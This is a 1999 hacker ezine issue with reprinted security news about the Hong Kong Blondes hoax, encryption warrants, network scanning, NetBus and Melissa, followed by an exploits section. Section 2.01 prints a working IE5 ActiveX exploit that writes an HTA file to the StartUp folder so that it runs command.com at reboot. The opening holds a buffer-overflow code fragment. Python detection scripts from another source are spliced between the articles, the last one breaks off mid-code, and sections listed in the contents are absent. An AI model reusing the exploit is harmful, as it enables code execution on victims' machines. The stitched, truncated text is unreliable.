
Antidote Vol. 02 Issue 14

Published in Antidote · 22 Aug 2019

  

Volume 2 Issue 14
8/28/99


http://www.security-source.net/antidote


bof_ptr = (long *)buffer;
for (i = 0; i < bufsize - 4; i += 4)
*(bof_ptr++) = get_sp() - offs;
printf ("Creating termcap f1le\n");
printf ("b1tch is Fe3lyn 1t.\n");


------------------------------

We normally don't do this, but please visit www.security-source.net/lordoak/hkattmp/
and check out the "Attempted Hack", it is soooo funny!

In this issue of Antidote, we have over 750 subscribers and are getting more every day!
The only thing that we ask of you when you read Antidote is that you go to:

www.security-source.net/popup.html

and click on our sponsors. One issue of Antidote takes us about a week to put together
and going to our sponsor only takes you about 15 seconds (if that). So please go visit
our sponsor because it is the only thing we ask of you.


-)!-- Contents //--(-

0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Authors
0.04 - Shouts
0.05 - Writing
1.00 - News
1.01 - The Hacker Hoax
1.02 - Feds want to Crack personal Computers
1.03 - Scanning for Trouble
1.04 - UA Sets the Record Straight on NetBus Pro
1.05 - IE5 Bug the Worst Ever?
1.06 - Melissa Virus creator Admits to Guilt
1.07 - Cult claims Hong Kong hackers are real threat
2.00 - Exploits (new & older)
2.01 - ie5.exec_programs.txt
2.02 - rh60.pt_chown.root.c.txt
2.03 - aix.pdnsd.bof.txt
3.00 - Misc

TIP.I - Tip of the issue/week thanks to akira_54.
SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just
plain making fun of something or someone.
FEAT.S - FEATURED SITES:
browse.security-source.net
www.403-security.org
www.hackernews.com

------------------------------



-)!-- 0.00 - Beginning //--(-

0.01 -)What?(-

What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, because
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is
basically current news and happenings in the underground world. We aren't going to
teach you how to hack or anything, but we will supply you with the current information
and exploits. Mainly Antidote is just a magazine for people to read if they have some
extra time on their hands and are bored with nothing to do. If you want to read a
magazine that teaches you how to hack etc., then you might want to go to your local
bookstore and see if they carry '2600'.

------------------------------


0.02 -)FAQ(-

Here are a lot of questions that we seem to receive a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions, and if the question
isn't on here or doesn't make sense, then you can e-mail us with your question.

> What exactly is "Antidote"?
See section 0.01 for a complete description.

> I find Antidote to not be shot for the beginner or does not teach you the basics,
why is that?
Antidote is for everyone; all we are basically is a news ezine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles that are in here are received second hand (sent to us) and we very rarely
edit anyone's articles.

> I just found Antidote issues on your webpage, is there any way I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
input your e-mail address. You will receive a link to the current Antidote (where you
can view it).

> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.

> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like
to be published above your article (when sending it to us) and we will do what you
say.

> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent
it to us first. If you sent us something and we didn't e-mail you back, then you
might want to send it again because we probably didn't get it (we respond to all
e-mails no matter what). We might use your article in future issues of Antidote.

> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it
or not.

Well, that's it for our FAQ. If you have a question that is not on here, or the question
is on here and you had trouble understanding it, then please feel free to e-mail
lordoak@thepoison.org and he will answer your question. This FAQ will probably be
updated every month.

------------------------------


0.03 -)Authors(-

Lord Oak is the founder of Antidote. Most work was done by him in Vol1 issues 1-5 and
Vol2 issues 1-13. Though, he is no longer with us.
OptikNerve is the current president of Antidote and security-source.net / thepoison.org.
Most work being done in Vol2 issues 14+ is done by him. Feel free to e-mail him at:
optiknerve@security-source.net.
Duece is the co-founder and co-president of Antidote; some work is done by him when he
comes online. Feel free to e-mail him at: duece@security-source.net
ox1dation is not really an author, just someone that helps us out a lot, and we consider
him an author! His e-mail address is: ox1dation@security-source.net

------------------------------


0.04 -)Shouts(-

These are just some shout outs that we feel we owe to some people. Some are individuals
and some are groups in general. If you are not on this list and you feel that for some
reason you should be, then please contact Lord Oak and he will post you on here, and we
are sorry for the misunderstanding. Well, here are the shout outs:

Lord Oak, OptikNerve, Duece, oX1dation, lyp0x, EazyMoney, Forlorn, opt1mus, PBBSER,
akira_54

Like we said above, if we forgot you and/or you think you should be added, please
e-mail lordoak@thepoison.org and he will be sure to add you.

------------------------------


0.05 -)Writing(-

As many of you know, we are always open to articles/submissions. We will take almost
anything that has to do with computer security. This leaves you open for:

-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....

The only thing that we really don't take is webpage hacks, like e-mailing us and saying
"www.xxx.com" was hacked... But if you have an opinion about the hacks, that is fine. If
you have any questions about what is "acceptable" and not, please feel free to e-mail
Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
note that if we receive two e-mails with the same topic/idea then we will use the one
that we received first. So it might be a good idea to e-mail one of us and ask if
someone has already written on this topic, so that you don't waste your time
writing something that won't be published. An example of this would be:

If Joe sends us an e-mail with the topic being on hacking hotmail accounts on
Thursday, and then Bill sends us an e-mail on hacking hotmail accounts on Sunday, we
will take Joe's article because he sent it in first.

But keep in mind, we might use your article for the next issue! If you have something
that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
duece@thepoison.org and one of us will review the article and put it in Antidote (if
we like it).

------------------------------


-)!-- 1.00 - News //--(-

1.01 -)The Hacker Hoax(- 8.23.99

[www.currents.net]

The world's press might have been fooled into believing that a Chinese hacker group
plans to bring down the country's information infrastructure. According to stories that
began circulating in July last year, the rogue group, the Hong Kong Blondes, is made up
of dissidents both overseas and within the Chinese Government.

The rumours began when an interview with the group's leader was published by US hacking
group the Cult of the Dead Cow (CDC) at http://www.cultdeadcow.com. In the interview,
elusive Hong Kong Blondes director Blondie Wong said that he had formed an organization
named the Yellow Pages, which would use information warfare to attack China's
information infrastructure.

The group threatened to attack both Chinese state organizations and Western companies
investing in the country. For their part, the CDC claimed that they would train the
Hong Kong Blondes in encryption and intrusion techniques.

One year after the group's supposed launch, there is no evidence that the Hong Kong
Blondes ever existed. In fact, all evidence appears to indicate that the Hong Kong
Blondes report was a highly successful hoax.

The story was first reported in Wired magazine, and during the past year has been
followed up by numerous publications including USNews, the Los Angeles Times, Asiaweek
and ComputerWorld. In every case, the original source was the CDC's July interview.

The CDC is best known for its remote administration tool Back Orifice. BO can be in-
stalled on a Windows PC without the user's knowledge, giving full control over the
machine to unauthorized third parties.

The first version of Back Orifice was released a month after the Blondes story was
leaked to Wired magazine.

Repeated attempts to contact the CDC failed to elicit a response, and despite inquiries
throughout the Hong Kong technology and security industries, not one person contacted
had ever come across any evidence of the group's existence.

The Hong Kong Police, which is responsible for tracking hacking activities locally, had
no knowledge of the group. Detective senior inspector Martyn Purbrick, of the Commer-
cial Crime Bureau's Computer Crime Section, said that there had been no official re-
ports of the group's activities. He added that he only knew the group's name through
reports in the media.

Stephen Mak, principal assistant secretary of the information technology and broadcast-
ing bureau, said, "We have carried out inquiries both within the government as well as
with the ISPA, but we could find no information about the group."


Samuel Chanson, director of the Cyberspace Centre at the Hong Kong University of Sci-
ence and Technology, said the threats would take no great skill to carry out. "Hacking
into almost any major server is do-able with some training."


Chanson said that a group of his undergraduate students took a two-day course in intru-
sion techniques, after which they were able to break into several hundred servers in
campus tests. "We checked how good their network security was and succeeded in bringing
down a good number of their servers as well as gaining important information... Attack-
ing the general commercial server is not a difficult task."


Early this year, a US hacker group, the Legion of the Underground (LoU) at
http://www.legions.org , launched a declaration of infowar on China, in response to the
harsh penalties handed out for computer offenses in the country. LoU members cited the
Hong Kong Blondes as an influence behind their short-lived war, which was abandoned
following condemnation from other hacker groups. However, a large number of Chinese Web
sites were hacked by protesters, including Hongkong.com, China Window, Wenjin Software
and the semi-official China Society for Human Rights Studies.

CDC remains tight-lipped on the issue. But publishers might do well to remember a
statement made by the group in its Media Domination Global Update: "We intend to domi-
nate and subvert the media wherever possible."


http://www.currents.net/newstoday/99/08/18/news3.html
------------------------------


1.02 -)Feds want to Crack personal Computers(- 8.23.99

[www.cnn.com]

The Clinton administration reportedly plans to ask Congress to give police authority to
secretly go into people's personal computers and crack their security codes.

Legislation drafted by the Justice Department would let investigators get a sealed war-
rant from a judge to enter private property, search through computers for passwords and
override encryption programs, The Washington Post reported Friday.

The newspaper quoted an August 4 department memo that said encryption software for
scrambling computer files "is increasingly used as a means to facilitate criminal ac-
tivity, such as drug trafficking, terrorism, white-collar crime and the distribution of
child pornography."


Under the measure, investigators would obtain sealed search warrants signed by a judge
as a prelude to getting further court permission to wiretap, extract information from
computers or conduct further searches.

Privacy advocates have objected to the plan, dubbed the Cyberspace Electronic Security
Act by the Justice Department. "They have taken the cyberspace issues and are using it
as justification for invading the home," James Dempsey, an attorney for the Center for
Democracy and Technology, told the Post.

Peter Swire, the White House's chief counselor for privacy, told the newspaper the ad-
ministration supports encryption as a way to provide privacy for computer users.

"But it has to be implemented in a way that's consistent with other values, such as law
enforcement," Swire said. "In this whole issue we have to strike the right balance."

The administration has for years been seeking a law to require computer makers to in-
clude a so-called Clipper Chip in their products that would give police a "back door"
into computers despite any encryption software they may contain.

In a backlash, more than 250 members of Congress have signed on as co-sponsors to leg-
islation that would prohibit mandating such back-door devices on computers.

http://www.cnn.com/TECH/computing/9908/20/computer.codes.ap/index.html
------------------------------


1.03 -)Scanning for Trouble(- 8.24.99

[www.msnbc.com]

Every day they come, they lurk then they leave without doing damage. And Ruiu is
powerless to stop it. Every method he has tried, they have trumped. They’re toying with
him.

"They must feel like gods," he says. They come at him through clients’ computers,
through Canadian ISPs, once even through one of the largest Canadian banks. They hack
into Linux boxes, NT boxes, Unix boxes. Hack by day or night. No matter.

And all for no apparent reason. They look, but don’t touch.

Ah, the life of a network administrator these days. There are thousands of ways to
break into a computer, and there are now several downloadable software packages design-
ed to scan the Internet for Web sites and servers that have just one flaw.

According to Peter Tippett at computer security research firm ICSA, a new box connected
to the Net will almost certainly be scanned before one week goes by. And the amount of
scanning activity has doubled in the past six months.

That’s about when the scanning started for Brandon Pepelea, a former employee at PSINet
who says his collection of Web sites has been scanned systematically several times a
week since January. In another example of a victimless probe, Pepelea thinks someone or
something has been banging through all the Internet addresses between 38.240.x.x and
38.200.x.x, a so-called Class-B range of addresses that constitute about 16,000 possi-
ble computers.

In his case, the scans were unsuccessful. Whoever or whatever it is, they haven’t been
able to break into Pepelea’s computers. Still, the relentless, systematic nature of the
probe has him spooked. He’s been demanding that PSINet, which owns all the addresses in
the 38.x.x.x range, chase down the scanner and prosecute.

"I don’t think they understand how serious it is," Pepelea said. "The threat is not so
much the nature of the scan but the scope of the scan. If you’re between 38.240 and
38.200 you’ve had the scans. They’ve walked through and gotten to you."

NOSE FOR TROUBLE
The attack itself involves use of the Simple Network Management Protocol, frequently
used on network routers. Pepelea owns machines between the 38.240 and 38.200 address
range, and concluded scans spanned that range by studying patterns of hits to his own
and his client’s machines.

This is not the first time Pepelea, now CEO of a small security company he calls
Designer’s Dream, has done a hefty amount of personal cybersleuthing. Last December, he
compiled information on a virus writer named VicodinES, and shared it with the FBI, the
CIA and other law enforcement agencies. His tips fell on deaf ears, and VicodinES, who
the world now knows as Dave Smith, went on to release the Melissa virus. Pepelea’s
hell-bent on being heard this time around. "Once again, nobody cares," he laments.

PSINet said early last week the scans were being generated by an account serviced by
the company, and that it had dealt with the matter by canceling the account. But by
Friday, the company had canceled three more accounts in an effort to stop the probes.
While officials there say they take the matter seriously, they are not convinced it’s
an organized hacker attack.


"It’s not possible to characterize whether this is a mistake, a malicious event, was
planned, or it just happened," said Cole Libby, Director of Network Engineering. "For
example, it could be a wrongly configured piece of hardware searching a section of the
Internet for a new printer. There are lots of examples of technology out of control in
the world."

NO HARM, NO FOUL?
Scanning, the cyberspace equivalent of walking down Main Street and jiggling handles to
see who leaves the front door unlocked, brings up murky legal issues. Entering someone
else’s computer is illegal, but scanning, which amounts to asking a computer how it’s
been set up, probably isn’t. Pepelea says PSINet told him to pursue legal action
against his cyberpest, but for what? Meanwhile, Pepelea thinks PSINet should be liable
if any real trouble ever comes from his suspected hacker, particularly since the Net
provider was warned.

That’s not likely, says Internet law expert Dorsey Morrow. PSINet would almost
certainly face no criminal liability for the actions of a hacker on their network, and
wouldn’t likely face civil liability either.

"As long as they can show ‘We were doing everything we can. We’ve got security policies
in place. We’re using the latest software.’ That mounts up to a pretty good defense,"
Morrow said.

So there are no consequences for scanning, either to the hacker or the company that
provides the means. But what of Ruiu’s hackers, who go just one step further than
Pepelea’s scanners? They scan, then enter, lurk around, and leave. Dancing tantalizingly
over the edge of the law, they show an ability to do far more damage.

Their methods are painstakingly deliberate, designed to avoid detection. They launch
attacks from multiple sites, sometimes sending no more than a packet per day from any
site, in order to hide the kind of suspicious activity protective sniffer programs look
for.

"We saw one new machine coming at us every five minutes," Ruiu said. "They must have
felt like gods because they could break into any machine they wanted."

That includes a collection of Canadian ISPs, and even one major Canadian bank, that the
hackers broke into. When he called, Ruiu often had a tough time convincing victimized
ISP administrators they’d been hacked.

"The reaction of ISPs was disbelief," he said. "One didn’t believe us until a marketing
guy had his laptop taken out and it started sending weird packets."

Ruiu is convinced the hacks are coming from a coordinated team, because of their speed
and variety. But while the cat-and-mouse game continues, he can only speculate on
motive. His company, a 15-person startup called Netsentry.net, is hardly a big target.
So Ruiu thinks his outside efforts in the security community are likely to blame. He
recently worked on a project called Trinux, which aimed to create a security-enhanced
version of Linux that fits on one floppy disk. Among his partners was Ken Williams, who
until recently ran Packet Storm Security, perhaps the most popular reference site in
the hacker community.

"I suspect these guys are targeting security software," he said, but added they have
not revealed their intentions. "This is really bugging me. The lack of a motive really
disturbs me. It gave me the creeps."

The attacks have also been humbling for Ruiu, who has spent a lot of time chasing the
hackers when he could be working to get his business off the ground.

"There are a lot of assumptions we’re all making about Internet security that we
shouldn’t," he said. "There’s a lot of things we don’t know."

For example, these hackers made a habit of hijacking machines Ruiu’s computers normally
talked to, then initiated attacks from these supposedly friendly computers. That made
them almost impossible to detect.

"If they get a machine that’s close to your machine, that’s almost as bad as taking
over your Web server. It’s a great place to launch an attack on your firewall," he said.

Nothing about Ruiu or Pepelea’s stories surprised ICSA’s Tippett, who expects security
problems to get worse before they get better.

"It’s the wild, wild West out there," he said. "The tools are pervasive and so common.
The chance of getting caught is pretty slim. Our neighbors are now very close and
enough of them don’t have a great social conscience."

http://www.msnbc.com/news/302835.asp#BODY
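A detection pass over firewall deny lines for the two probe patterns the article describes: one source walking udp/161 (SNMP) across the 38.200-38.240 block, and many sources each sending a single probe at one target. This is an added example, not code from the MSNBC story or from any of the companies named in it; the log line format, the sample lines, the thresholds and the source addresses are all constructed.

```python
"""Flag SNMP address sweeps and low-and-slow distributed probes in deny logs.
Added example; the log format and sample below are constructed, not real."""
import ipaddress
import re
from collections import Counter, defaultdict

# Constructed line format: "<ts> <host> DENY udp src=A dst=B dport=N"
LOG_RE = re.compile(
    r"^\w{3} +\d+ [\d:]+ \S+ DENY udp "
    r"src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)$"
)
SNMP_PORT = 161
# The block the article says was being walked (PSINet's 38.x space, 38.200-38.240).
RANGE_LO = int(ipaddress.ip_address("38.200.0.0"))
RANGE_HI = int(ipaddress.ip_address("38.240.255.255"))


def parse(lines):
    """Yield (src, dst, dport) for every line that matches the constructed format."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            yield m["src"], m["dst"], int(m["dport"])


def in_watched_range(dst):
    return RANGE_LO <= int(ipaddress.ip_address(dst)) <= RANGE_HI


def detect(lines, min_hosts=4, min_sources=3):
    """Return {'sweeps': [...], 'low_and_slow': [...]}.

    sweeps: one entry per source that probed >= min_hosts distinct watched
            addresses on udp/161 (the systematic walk Pepelea saw).
    low_and_slow: one entry per target hit by >= min_sources distinct sources
            that each sent exactly one probe (the one-packet-per-site pattern
            Ruiu described), which a per-source threshold never reaches, so the
            aggregation is done by target instead of by source."""
    per_src = defaultdict(set)   # source -> distinct watched targets
    per_dst = defaultdict(set)   # watched target -> distinct sources
    probes = Counter()           # source -> total udp/161 probes seen
    for src, dst, dport in parse(lines):
        if dport != SNMP_PORT or not in_watched_range(dst):
            continue
        per_src[src].add(dst)
        per_dst[dst].add(src)
        probes[src] += 1

    sweeps = []
    for src, dsts in sorted(per_src.items()):
        if len(dsts) >= min_hosts:
            ordered = sorted(dsts, key=lambda d: int(ipaddress.ip_address(d)))
            sweeps.append({"src": src, "hosts": len(dsts),
                           "first": ordered[0], "last": ordered[-1]})

    low_and_slow = []
    for dst, srcs in sorted(per_dst.items()):
        singles = sorted(s for s in srcs if probes[s] == 1)
        if len(singles) >= min_sources:
            low_and_slow.append({"target": dst, "sources": singles})
    return {"sweeps": sweeps, "low_and_slow": low_and_slow}


# Constructed sample: one source walking 38.240.0.1-5, an unrelated udp/80
# deny, three sources each sending one probe at 38.200.5.5 on successive
# days, and one probe that falls outside the watched block.
SAMPLE_LOG = """\
Aug 23 03:14:01 gw DENY udp src=192.0.2.10 dst=38.240.0.1 dport=161
Aug 23 03:14:02 gw DENY udp src=192.0.2.10 dst=38.240.0.2 dport=161
Aug 23 03:14:03 gw DENY udp src=192.0.2.10 dst=38.240.0.3 dport=161
Aug 23 03:14:04 gw DENY udp src=192.0.2.10 dst=38.240.0.4 dport=161
Aug 23 03:14:05 gw DENY udp src=192.0.2.10 dst=38.240.0.5 dport=161
Aug 23 03:15:00 gw DENY udp src=198.51.100.7 dst=38.240.0.9 dport=80
Aug 23 03:16:00 gw DENY udp src=203.0.113.1 dst=38.200.5.5 dport=161
Aug 24 03:16:00 gw DENY udp src=203.0.113.2 dst=38.200.5.5 dport=161
Aug 25 03:16:00 gw DENY udp src=203.0.113.3 dst=38.200.5.5 dport=161
Aug 25 03:17:00 gw DENY udp src=203.0.113.4 dst=38.250.0.1 dport=161
"""

if __name__ == "__main__":
    for kind, items in detect(SAMPLE_LOG.splitlines()).items():
        for item in items:
            print(kind, item)
```

The low-and-slow rule deliberately keys on targets rather than sources, which is the only way a per-day, one-packet-per-site pattern becomes visible in a single log.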
------------------------------


1.04 -)UA Sets the Record Straight on NetBus Pro(- 8.25.99

[www.ultraaccess.net]

UltraAccess.net, a leading software design and network consulting firm located in
Jacksonville, Florida, announced today that they are going to set the record straight on
their highly controversial product, NetBus Pro 2.10. With virtually no marketing push
the company has sold thousands of copies and acquired hundreds of corporate, federal, and
educational clients since its 2.0 release in mid-February. But all of this has not come
without its share of problems, and NetBus has remained a product under siege.

NetBus has met resistance because many large anti-virus software companies have made
claims that the product is a hacker’s tool and are treating the program like a virus.
Because of this, NetBus is ultimately incompatible with many name-brand anti-virus
programs. "Anti-virus companies are knocking our product because it’s competition for
their remote administration software," says Judd Spence, CEO of UltraAccess Networks
Inc. "What’s worse is that our sales have been impacted because of this, and quite
frankly, we think this is defamation and restraint of trade."

NetBus Pro is a remote administration tool that is extremely easy to install and
enables users to administrate remote computers within minutes. The product contains many
features for remote administration, such as the File Manager, Registry Manager, HTTP
Support, Telnet Support, and Application Redirect. In addition, NetBus Pro has added
features like Capture screen, Listen keyboard and Capture camera image for spying. All
these features, among several others, have been migrated into a single package. "It is
a commercial product and it looks extremely professionally written. You can use these
products for lawful or unlawful purposes," said Jan Hruska, technical director of
Sophos, a popular anti-virus software vendor.

"NetBus users have found our product to be extremely useful because it has every
feature that our high-dollar competition has and much more," says Spence. "In addition,
we have received numerous awards, including a 5 cow rating from TUCOWS, 5 stars from
Supershareware.com, and a #1 rating from DaveCentral.com."

Frustrated by the competition’s stabs at their product's reputation, NetBus officials
say they are considering legal action. "On its face, it looks like a good case," said
attorney Mark Rubin, who has been retained by NetBus. "The product belongs to a
corporation. It’s designed to do a function. You’ve got another business telling people,
‘You can’t use that product’ ... You’ve got Symantec saying you shouldn’t use NetBus
Pro. That’s the classic definition of an anti-competitive act."

NetBus has quickly developed a reputation as a company that is on the edge of becoming
a huge success. "It’s pretty simple, we strive to provide an easy to use, high quality
product so users can get the job done without any guesswork," says Spence. "NetBus Pro
is a totally legitimate remote administration tool and at only $15 a copy it’s less
than one-tenth the price of some of our big-name competitors such as PCAnywhere from
Symantec Corp."

http://www.ultraaccess.net
------------------------------


1.05 -)IE5 Bug the Worst Ever?(- 8.25.99

[www.internetnews.com]

Bulgarian browser bugmeister Georgi Guninski is at it again. The 27-year-old indepen-
dent computer consultant has discovered a new security flaw affecting Internet Explorer
5, which enables a malicious hacker to place a program on the victim's hard disk, to be
executed at the next reboot.

Guninski is credited by Microsoft with discovering and publicizing a number of
significant security flaws in its Internet Explorer browser in the past year. While he's
also spotted several security bugs in Netscape's Navigator, Guninski is especially fond
of poking holes in Active X, the scripting technology used in IE.

"I think this is the most significant of my discoveries and the most dangerous also,"
Guninski told InternetNews Radio. "It allows a Web page or e-mail message to take
control of the computer and do anything."

According to Guninski, the attack can be launched by causing IE5 users to click on a
hyperlink on a web page, but it also can be transmitted by e-mail to users of
Microsoft's Outlook 98. The exploit places an executable program in an HTML Application
file in a Windows 95 or 98 computer's start-up folder. When the victim reboots his or
her computer, the program will execute.

Guninski said the problem lies in an Active X control called "Object for constructing
type libraries for scriptlets". He has posted a demo and source code of the exploit at
his Web site.

Microsoft officials were not immediately available for comment. Guninski asserts that
the company has reproduced the bug and plans to issue a patch. In the meantime,
concerned IE5 users can protect themselves by going into the Security tab of the
browser's Internet Options menu and disabling ActiveX controls or plug-ins.

-)(See section 2.01 for the exploit)(-

http://www.internetnews.com/prod-news/print/0,1089,9_188461,00.html
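An added example, not code from the article or from Guninski's advisory, that audits a Windows StartUp folder for the persistence artifact described above: an HTML Application file dropped there runs at the next reboot, and the advisory lets the attacker pick only part of the file's content, so the check inspects file bodies rather than trusting names alone. The Windows 95/98 folder path is an assumption (the folder is passed in so the audit runs anywhere), and the sample folder it builds is constructed.

```python
"""Audit a StartUp folder for dropped HTML Application files.
Added example; the default path is assumed and the sample folder is constructed."""
import os
import re
import tempfile

# CLSID of the ActiveX control named in the advisory (section 2.01).
SCRIPTLET_TYPELIB_CLSID = "06290BD5-48AA-11D2-8432-006008C3FBFC"
# Assumed Windows 95/98 location; pass a different path for other systems.
WIN9X_STARTUP = r"C:\WINDOWS\Start Menu\Programs\StartUp"

CLSID_RE = re.compile(r"clsid:([0-9a-f-]{36})", re.IGNORECASE)
MARKUP_RE = re.compile(r"<(script|object)\b", re.IGNORECASE)
SAFE_EXT = {".lnk"}  # ordinary shortcuts; every other file body is inspected


def audit_startup_folder(folder=WIN9X_STARTUP):
    """Return one finding per file that is an .hta by extension or carries
    <script>/<object> markup under any other extension. Each finding lists
    the ActiveX CLSIDs the file instantiates and whether one of them is the
    control from the advisory. A clean folder yields []."""
    findings = []
    for name in sorted(os.listdir(folder)):
        path = os.path.join(folder, name)
        ext = os.path.splitext(name)[1].lower()
        if not os.path.isfile(path) or ext in SAFE_EXT:
            continue
        # latin-1 never fails to decode, so binary junk before the markup
        # (the "unneeded information" the advisory mentions) is harmless here.
        with open(path, "r", encoding="latin-1", errors="replace") as fh:
            body = fh.read()
        has_markup = bool(MARKUP_RE.search(body))
        if ext == ".hta" or has_markup:
            clsids = sorted({c.upper() for c in CLSID_RE.findall(body)})
            findings.append({
                "file": name,
                "is_hta": ext == ".hta",
                "has_markup": has_markup,
                "clsids": clsids,
                "names_advisory_control": SCRIPTLET_TYPELIB_CLSID in clsids,
            })
    return findings


def make_sample_folder():
    """Build a constructed StartUp folder: a benign shortcut, a plain text
    note, and a dropped .hta whose body starts with junk bytes and then
    instantiates the advisory's control. Returns the folder path."""
    folder = tempfile.mkdtemp(prefix="startup_")
    files = {
        "Office Startup.lnk": "L\x00\x00\x00",
        "readme.txt": "nothing to see here\n",
        "update.hta": ('\x00\x01junk typelib bytes <object id="scr" classid="clsid:'
                       + SCRIPTLET_TYPELIB_CLSID.lower()
                       + '"></object><script>alert(1)</script>'),
    }
    for name, body in files.items():
        with open(os.path.join(folder, name), "w", encoding="latin-1") as fh:
            fh.write(body)
    return folder


if __name__ == "__main__":
    for finding in audit_startup_folder(make_sample_folder()):
        print(finding)
```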
------------------------------


1.06 -)Melissa Virus creator Admits to Guilt(- 8.26.99

[www.cnn.com]

The man charged with creating the Melissa computer virus that clogged e-mail systems
around the world admitted he created the bug, a prosecutor alleges in court papers.

David L. Smith, a former computer programmer, was arrested in April.

A brief filed in state Superior Court by Supervising Deputy Attorney General
Christopher G. Bubb says Smith waived his Miranda rights and spoke to investigators when
police arrived at his apartment.

"Smith admitted, among other things, to writing the 'Melissa' macro virus, illegally
accessing America Online for the purpose of posting the virus onto cyberspace, and
destroying the personal computers he used to post 'Melissa,'" Bubb wrote.

Defense lawyer Edward P. Borden Jr. told the Asbury Park Press of Neptune that he dis-
putes Bubb's assertions. He refused to comment further, the newspaper reported today.

The Melissa virus was disguised as an e-mail marked "important message" from a friend
or colleague of each recipient. It caused affected computers to create and send 50
additional infected messages. The volume of messages generated slowed some systems to a
crawl.

Authorities say the virus was named after a topless dancer in Florida.

Bubb's brief was filed in response to a defense motion seeking additional prosecution
documents.

Borden says he needs the prosecution documents to file a motion to suppress evidence
seized during the search of Smith's apartment. A hearing on his motion was to be held
Wednesday afternoon.

Smith is charged with interruption of public communications, conspiracy and theft of
computer service. The maximum penalty for the offense is 40 years in prison.

He remains free on $100,000 bail.

http://www.cnn.com/US/9908/25/melissa.virus.ap/index.html
------------------------------


1.07 -)Cult claims Hong Kong hackers are real threat(- 8.26.99

[www.itdaily.com]

Leading US hacker group the Cult of the Dead Cow has told itdaily.com that elusive Chi-
nese hackers the Hong Kong Blondes are operating in Asia.

According to the CDC, the Blondes are a group of Chinese dissidents who aim to desta-
bilise the Chinese Government through the Internet. Along with an offshoot named the
Yellow Pages, the group threatened to use information warfare to attack China's infor-
mation infrastructure. The group threatened to attack both Chinese state-owned organi-
sations and Western companies investing in the country.

When the group was first reported, the CDC claimed to be training the Blondes in en-
cryption and intrusion techniques.

A recent investigation by itdaily.com found no evidence of the group's existence. De-
spite approaching the Hong Kong ISP Association, the Hong Kong Government, Police, uni-
versities, security experts and hackers alike, nobody contacted by itdaily.com knew
anything about the group.

However, CDC foreign minister OXblood Ruffin told itdaily.com that the Hong Kong
Blondes are for real, and that they are operating in Asia. The chief organisers,
nicknamed Blondie Wong and Lemon Li, were last reported to be based in India.

"The Blondes do exist, although the CDC has truncated our official relationship with
them," said Ruffin. "The Yellow Pages on the other hand briefly existed but were shut
down by me."

Ruffin said that the reason the group has been so low-key is that they operate secretly
to avoid compromising members in China. "They're hyper secure. They're organised in
cells of three members with no one but Blondie and Lemon knowing the entire
membership."

The CDC has portrayed the Hong Kong Blondes as "hacktivists", meaning they break into
computer networks for political ends. "The Yellow Pages got together and they were
gonna do support work to draw attention to social justice issues in China linked to
current trading practices on the Western side..."

Ruffin said that he later learned that the group planned to shut down the networks of a
number of large US corporations, at which point he decided to disband the group and
dissociate himself from the Hong Kong Blondes.

"The American public would not have supported any such adventure and it would have
worked seriously against the cause," he said.

He added that the CDC no longer maintains any relationship with the group.

As previously reported in itdaily.com, the first and only Hong Kong Blondes interview
was leaked to the press by the CDC just one month before the group released its well-
known remote administration tool Back Orifice. BO can be installed on a Windows PC
without the user's knowledge, giving full control over the machine to unauthorised
third parties.

Since then, Back Orifice has become widespread internationally, particularly in China.
There is still no evidence beyond the word of OXblood Ruffin that the Hong Kong Blondes
do, in fact, exist, but as Ruffin's e-mail signature notes: "First we take the networks,
then we take Peking."

http://www.itdaily.com/daily.lasso?-database=dailybasepublic&-layout=today&-response=itdailyfree.htm&-recid=39830&-search
------------------------------



TIP.I -)Tip of the Week!(-

Eyes tired... burning from reading all those txt files?? Get a TTS (Text To Speech)
program, they really help. The best one for Windows I think is ReadPlease... There are
many for Linux so look around!

akira_54
------------------------------



-)!-- 2.00 - Exploits //--(-

2.01 -)ie5.exec_programs.txt(- 8.25.99

[www.nat.bg/~joro]

Disclaimer:

The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski is not
liable for any damages caused by direct or indirect use of the information or
functionality provided by this program.

Georgi Guninski bears NO responsibility for content or misuse of this program or any
derivatives thereof.

Description:

Internet Explorer 5.0 under Windows 95/98 (do not know about NT) allows executing
arbitrary programs on the local machine by creating and overwriting local files and
putting content in them.

Details:

The problem is the ActiveX Control "Object for constructing type libraries for
scriptlets".

It allows creating and overwriting local files and, what is more, putting content in
them.

There is some unneeded information in the file, but part of the content may be chosen.

So, an HTML Application file may be created, fed with exploit content and written to
the StartUp folder.

The next time the user reboots (which may be forced), the code in the HTML Application
file will be executed.

This vulnerability can be exploited via email.

Workaround:

Disable Active Scripting or Disable Run ActiveX Controls and plug-ins.

The code is:

<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski http://www.nat.bg/~joro');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>

http://www.nat.bg/~joro/scrtlb.html
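A signature check for the pattern in the advisory above, added here as an example and not part of Guninski's advisory: it flags HTML in which an object bound to the type-library control's CLSID is given a Path and then written, which is the shape a mail gateway or content filter could look for. The two sample pages and the all-zero CLSID in the benign one are constructed placeholders.

```python
import re

# CLSIDs quoted in the advisory: the Scriptlet.TypeLib control and the WSH shell object.
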